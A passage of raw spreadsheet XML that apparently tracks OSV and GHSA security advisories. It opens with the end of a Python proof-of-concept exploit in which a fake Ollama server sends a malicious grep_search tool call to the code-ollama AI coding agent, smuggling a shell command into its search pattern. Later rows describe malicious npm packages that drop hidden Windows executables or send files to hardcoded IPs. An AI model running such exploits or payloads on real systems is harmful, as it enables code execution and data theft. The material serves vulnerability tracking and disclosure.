            # First request: inject malicious grep_search tool call
            # The `arguments` object is passed verbatim through the ollama-npm
            # library and reaches grepSearch(pattern, path) in grep.ts.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  f"sending malicious grep_search tool_call")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "",
                    "tool_calls": [{
                        "function": {
                            "name": "grep_search",
                            # pattern and path are the two required string args
                            # validated by validateArgs() in dispatcher.ts
                            "arguments": {
                                "pattern": INJECTED_CMD,
                                "path": TARGET_PATH,
                            },
                        }
                    }],
                },
                "done": True,
                "done_reason": "stop",
            }
        else:
            # ---------------------------------------------------------------
            # Subsequent requests: plain text to terminate the tool loop.
            # No tool_calls -&gt; nextMessages stays null -&gt; processRunStream
            # returns after checking hasUncalledToolIntent (no match on
            # "Done.") so the CLI exits cleanly.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  "sending done/stop response")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "Done.",
                },
                "done": True,
                "done_reason": "stop",
            }
        self.wfile.write((json.dumps(chunk) + "\n").encode())
        self.wfile.flush()
def start_fake_server():
    """Start the fake Ollama server in a daemon thread."""
    server = HTTPServer((FAKE_SERVER_HOST, FAKE_SERVER_PORT), FakeOllamaHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server
# ---------------------------------------------------------------------------
# Main orchestration
# ---------------------------------------------------------------------------
def main():
    print("=" * 65)
    print("VULN-001: grep_search Command Injection PoC (CWE-78)")
    print("Target : ai-action/code-ollama v0.36.0")
    print("Sink   : src/utils/tools/filesystem/grep.ts:65")
    print("=" * 65)
    print()
    print(f"[*] Payload  : {INJECTED_CMD}")
    print(f"[*] Marker   : {MARKER_FILE}")
    print()
    # Clean up any leftover marker from a previous run
    if os.path.exists(MARKER_FILE):
        os.unlink(MARKER_FILE)
        print(f"[*] Removed stale marker file: {MARKER_FILE}")
    # -----------------------------------------------------------------------
    # 1. Start the fake Ollama server
    # -----------------------------------------------------------------------
    print(f"[*] Starting fake Ollama server on "
          f"{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT} ...")
    start_fake_server()
    time.sleep(0.4)   # give the server socket time to bind
    # -----------------------------------------------------------------------
    # 2. Run code-ollama with OLLAMA_HOST pointing to the fake server
    #    --trust skips the interactive directory-trust prompt (src/cli.ts:214)
    # -----------------------------------------------------------------------
    env = os.environ.copy()
    env["OLLAMA_HOST"] = f"http://{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT}"
    # Use the compiled CLI bundle produced by `npm run build` in the Dockerfile
    cmd = [
        "node", "/app/dist/cli.js",
        "run", "--trust", "fake", "search the code",
    ]
    print(f"[*] Executing: {' '.join(cmd)}")
    print(f"[*] OLLAMA_HOST={env['OLLAMA_HOST']}")
    print()
    try:
        result = subprocess.run(
            cmd,
            env=env,
            stdin=subprocess.DEVNULL,   # no TTY / interactive input needed
            capture_output=True,
            text=True,
            timeout=60,
            cwd="/workspace",
        )
    except subprocess.TimeoutExpired:
        print("[-] code-ollama subprocess timed out after 60 s")
        sys.exit(1)
    print("--- code-ollama stdout ---")
    print(result.stdout[:3000] if result.stdout else "(empty)")
    print("--- code-ollama stderr ---")
    print(result.stderr[:3000] if result.stderr else "(empty)")
    print(f"--- exit code: {result.returncode} ---")
    print()
    # -----------------------------------------------------------------------
    # 3. Verify exploitation: check for the marker file
    # -----------------------------------------------------------------------
    if os.path.exists(MARKER_FILE):
        evidence = open(MARKER_FILE).read().strip()
        print("[+] ============================================================")
        print("[+] EXPLOITATION CONFIRMED")
        print("[+] ============================================================")
        print(f"[+] Marker file : {MARKER_FILE}")
        print(f"[+] Contents    : {evidence!r}")
        print("[+] Explanation : The $() command substitution inside the")
        print("[+]   grep_search pattern was NOT escaped by code-ollama's")
        print("[+]   sanitizer (grep.ts:58-63 only strips \\ and \").")
        print("[+]   execShell() passed the raw string to child_process.exec()")
        print("[+]   which ran it through /bin/sh, executing the injected")
        print("[+]   command as the current user.")
        print("[+] ============================================================")
        sys.exit(0)
    else:
        print("[-] ============================================================")
        print("[-] EXPLOITATION FAILED")
        print(f"[-] Expected marker file NOT found: {MARKER_FILE}")
        print("[-] Possible causes:")
        print("[-]   - ollama-npm parsed tool_call.arguments differently")
        print("[-]   - The pattern was sanitized before reaching execShell()")
        print("[-]   - ripgrep is not installed so the fallback path was taken")
        print("[-]   - The shell used does not support $() substitution")
        print("[-] ============================================================")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>GHSA-65gf-jmp3-4wrc</t>
        </is>
      </c>
      <c r="D210" s="5" t="inlineStr"/>
      <c r="E210" s="5" t="inlineStr"/>
      <c r="F210" s="5" t="inlineStr"/>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr">
        <is>
          <t>npm:wbnr-probe-visible-check</t>
        </is>
      </c>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr"/>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (a1f50ae8c3560fd6aedcceecf9e5289ed72c06bd746e21c4925b402c5d1ef3f9)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10" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17212</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>GHSA-865f-pwj5-p2c5</t>
        </is>
      </c>
      <c r="D211" s="5" t="inlineStr"/>
      <c r="E211" s="5" t="inlineStr"/>
      <c r="F211" s="5" t="inlineStr"/>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr">
        <is>
          <t>npm:@wbnr/design-kit</t>
        </is>
      </c>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr"/>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c3b05ae1cf2f1c184b793a46f4bebd59f7945ef1f671c4e6bd64ee946c416e2b)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11" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17204</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>GHSA-94r6-cxjq-fq4r</t>
        </is>
      </c>
      <c r="D212" s="5" t="inlineStr"/>
      <c r="E212" s="5" t="inlineStr"/>
      <c r="F212" s="5" t="inlineStr"/>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr">
        <is>
          <t>npm:@wbnr/lottiefiles-loader</t>
        </is>
      </c>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr"/>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (2f4124e4c91354a00657c25874fb6b9f762438eee2ecd1d8b686af3d4d4ea8c9)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12" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17205</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>GHSA-9f7c-6fp7-9g6x</t>
        </is>
      </c>
      <c r="D213" s="5" t="inlineStr"/>
      <c r="E213" s="5" t="inlineStr"/>
      <c r="F213" s="5" t="inlineStr"/>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr">
        <is>
          <t>npm:kjj81</t>
        </is>
      </c>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr"/>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (73eb4923beefd1002ed194dadf8c7712ed082fbd0d9dcdfba1db3a02e1fa82ef)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13" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17207</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>GHSA-cxrh-669r-w2g9</t>
        </is>
      </c>
      <c r="D214" s="5" t="inlineStr"/>
      <c r="E214" s="5" t="inlineStr"/>
      <c r="F214" s="5" t="inlineStr"/>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-kit</t>
        </is>
      </c>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr"/>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (db00b593e7fc0c9c362e06fce588b1fa25a695114032504a7d6c72f5141f39ae)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14" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17221</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>GHSA-fm5g-6rr8-p9vq</t>
        </is>
      </c>
      <c r="D215" s="5" t="inlineStr"/>
      <c r="E215" s="5" t="inlineStr"/>
      <c r="F215" s="5" t="inlineStr"/>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr">
        <is>
          <t>npm:nebula-sdk</t>
        </is>
      </c>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr"/>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f0ca45fda7abd51edfeef37be6d19b4070788180b7625f16354223d81dae4d45)
The preinstall.cjs lifecycle script embeds a base64-encoded, zlib-compressed Windows PE (~257KB) as a string literal. On `npm install`, the script decodes and decompresses the blob, writes the resulting executable to %LOCALAPPDATA%\Microsoft\Conhost\conhost.exe (masquerading as the legitimate Windows conhost binary), and spawns it detached with stdio ignored and windowsHide set to true, executing attacker-controlled native code on the installer's Windows machine with no user interaction. Decoded payload strings reference github.com/syskiel/kntrat-e and the IP 65.87.7.132, consistent with a native RAT-family tool. The package's advertised purpose is an AI SDK; a bundled native Windows executable dropped at install time is unrelated to that purpose and is delivered through multi-layer obfuscation (base64 + zlib + string-literal embedding) inside the lifecycle hook.
## Source: ghsa-malware (6173d4941c91c361332072d4542cc10d3cefb945bc40a75ab83e07ffdc2fdb77)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15" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17219</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>GHSA-jhjp-4c2q-xmx4</t>
        </is>
      </c>
      <c r="D216" s="5" t="inlineStr"/>
      <c r="E216" s="5" t="inlineStr"/>
      <c r="F216" s="5" t="inlineStr"/>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>github, go, gin</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/falcosecurity/plugins/plugins/k8saudit, Go:github.com/falcosecurity/plugins/plugins/k8saudit-aks, Go:github.com/falcosecurity/plugins/plugins/k8saudit-eks, Go:github.com/falcosecurity/plugins/plugins/k8saudit-gke, Go:github.com/falcosecurity/plugins/plugins/k8saudit-ovh</t>
        </is>
      </c>
      <c r="M216" s="5" t="inlineStr">
        <is>
          <t>0.12.0, 0.18.0, 0.6.0, 0.9.0</t>
        </is>
      </c>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr"/>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>k8saudit shipped rules do not detect privileged/sensitive settings on init or ephemeral containers in github.com/falcosecurity/plugins/plugins/k8saudit</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GO-2026-6538</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>GHSA-jxw5-69p3-hpm4</t>
        </is>
      </c>
      <c r="D217" s="5" t="inlineStr"/>
      <c r="E217" s="5" t="inlineStr"/>
      <c r="F217" s="5" t="inlineStr"/>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr">
        <is>
          <t>npm:native-runner</t>
        </is>
      </c>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr"/>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c057973da17ec629b4cd8c10a2b74108761f4a9ad4a1a31b280031da1f7139ca)
On `require('native-runner')`, a top-level IIFE in index.js polls for up to two minutes for a file at %APPDATA%\Microsoft\Windows\node_runtime_helper.exe and, once present, spawns it via child_process.spawn with {detached:true, windowsHide:true, stdio:'ignore'} and unref's the child, so the process outlives the importing Node process with no visible window and no captured output. This launcher is not part of the package's advertised API (README describes only `runBinary`/`runDetached`) and fires purely as a side effect of import. The staging directory %APPDATA%\Microsoft\Windows is chosen to resemble a legitimate Windows system location. The manifest declares a single dependency, `img-to-native@^1.0.0`, which is never require()'d by the shipped source; its only role in the install graph is to place the binary that this package then launches. Together the two packages form a drop-and-execute chain: installing and importing native-runner pulls in img-to-native, which stages node_runtime_helper.exe at the hardcoded path, and native-runner's import-time IIFE then executes that opaque binary hidden and detached on the installer's machine.
## Source: ghsa-malware (4eb077250ca4da76df88e49a2c314e67cb58761ae1cbffa1aa7742878d042a44)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17" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17218</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>GHSA-mh9w-qr45-6wrq</t>
        </is>
      </c>
      <c r="D218" s="5" t="inlineStr"/>
      <c r="E218" s="5" t="inlineStr"/>
      <c r="F218" s="5" t="inlineStr"/>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>npm, vite, gin</t>
        </is>
      </c>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr">
        <is>
          <t>npm:vite-plugin-crypto</t>
        </is>
      </c>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr"/>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (54ee82c069dcdf259199f5844c6ff46be3020d79609ff7b7b8ebc82017c59b2c)
vite-plugin-crypto@1.0.2 exposes a Vite plugin factory whose body concatenates three option fields — `secret`, `salt`, and `iv` — into a single string and passes it to `System.import(...)` from the `systemjs` runtime module loader, discarding the returned promise with `.then(() =&gt; {})`. Only `secret` is used by the advertised AES-GCM `encrypt()` path; `salt` and `iv` are declared on the options type but are absent from the documented options table and are unused by the real crypto code (which generates its own random salt/IV per call). The concatenated string is treated as a module specifier by SystemJS, which resolves URLs and executes fetched JavaScript, so whoever controls these option values obtains arbitrary JavaScript execution on the Vite build/dev host each time the config is loaded. Pulling in a browser-oriented dynamic module loader as the package's only runtime dependency, naming the concatenated input `derivedSecret`, and swallowing the promise frame the remote-loader call as a benign key-derivation step. Base64 decoding in dist/index.cjs and dist/index.js is used within the AES-GCM helper. The trigger fires at plugin construction during `vite build` / `vite dev`.
## Source: ghsa-malware (fdaf333e613f70df12ceaf378093d996a4bc1dd4df1a6350c4848a5de0fb83e7)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18" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17222</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>GHSA-pm4h-xrhq-vh62</t>
        </is>
      </c>
      <c r="D219" s="5" t="inlineStr"/>
      <c r="E219" s="5" t="inlineStr"/>
      <c r="F219" s="5" t="inlineStr"/>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr">
        <is>
          <t>npm:kalasnik-npm-simple-test</t>
        </is>
      </c>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr"/>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f1463688412306d5d6f791bb036bea59aeb7251a3044a52c57119768f27cd463)
The package's postinstall script send_data.js runs automatically on npm install. It reads C:\temp\test.txt from the installer's filesystem and POSTs the contents over plain HTTP to a hardcoded remote endpoint at 35.178.197.251:8080. Package metadata ("Simplified test", author "Purple", UNLICENSED) is consistent with a PoC exfiltration harness rather than a legitimate library.
## Source: ghsa-malware (892887d57c2d036af7c30a0a27995006f042229dd0959c7653a5560054277cbe)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19" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17206</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>GHSA-pqvc-prrc-mv45</t>
        </is>
      </c>
      <c r="D220" s="5" t="inlineStr"/>
      <c r="E220" s="5" t="inlineStr"/>
      <c r="F220" s="5" t="inlineStr"/>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr">
        <is>
          <t>npm:uuid-date</t>
        </is>
      </c>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr"/>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1794c1dba5ffb902f0c8011a60990baff7cf5ebc1f90ab634937734944696995)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20" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17210</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>GHSA-pv7p-ghgv-268x</t>
        </is>
      </c>
      <c r="D221" s="5" t="inlineStr"/>
      <c r="E221" s="5" t="inlineStr"/>
      <c r="F221" s="5" t="inlineStr"/>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr">
        <is>
          <t>npm:img-to-native</t>
        </is>
      </c>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr"/>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7676788d88c2194b8d5c048decfbe06550798ce342af54f8975bc26422d10c53)
On require() of img-to-native, index.js reads banner.jpg from the.cache directory of its sole dependency cdn-img-fetch, locates a payload appended after the PNG IEND marker, base64-decodes it, and AES-256-CBC decrypts it using a key derived from sha256('nif-runtime-2027'). The decrypted bytes are written to %LOCALAPPDATA%\Programs\NodeRuntime\node_runtime_helper.exe with mode 0o755, and the source image is then unlinked. An fs.watch fallback waits for the image to appear if it is not yet staged. The payload is obfuscated (hidden after a PNG end-of-image marker, base64-encoded, AES-encrypted), unverified (no hash or signature check), and dropped to a persistence-adjacent path with executable bits set. The advertised purpose ("convert image files to native binary representation") does not require decrypting content appended after a PNG IEND chunk to materialize a Windows executable. The companion package cdn-img-fetch is pinned as a caret range (^1.0.0), so future 1.x releases can silently change the delivered payload bytes. Installing or loading this package results in attacker-controlled code being written to the installer's filesystem with execute permission.
## Source: ghsa-malware (7131e9cb1bdeb272ae7e26f2877087fd5da8716ef7c08e0fc0bf1359e278df8e)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21" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17216</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>GHSA-w4g6-rgx4-2wjf</t>
        </is>
      </c>
      <c r="D222" s="5" t="inlineStr"/>
      <c r="E222" s="5" t="inlineStr"/>
      <c r="F222" s="5" t="inlineStr"/>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr">
        <is>
          <t>npm:my-skibidi</t>
        </is>
      </c>
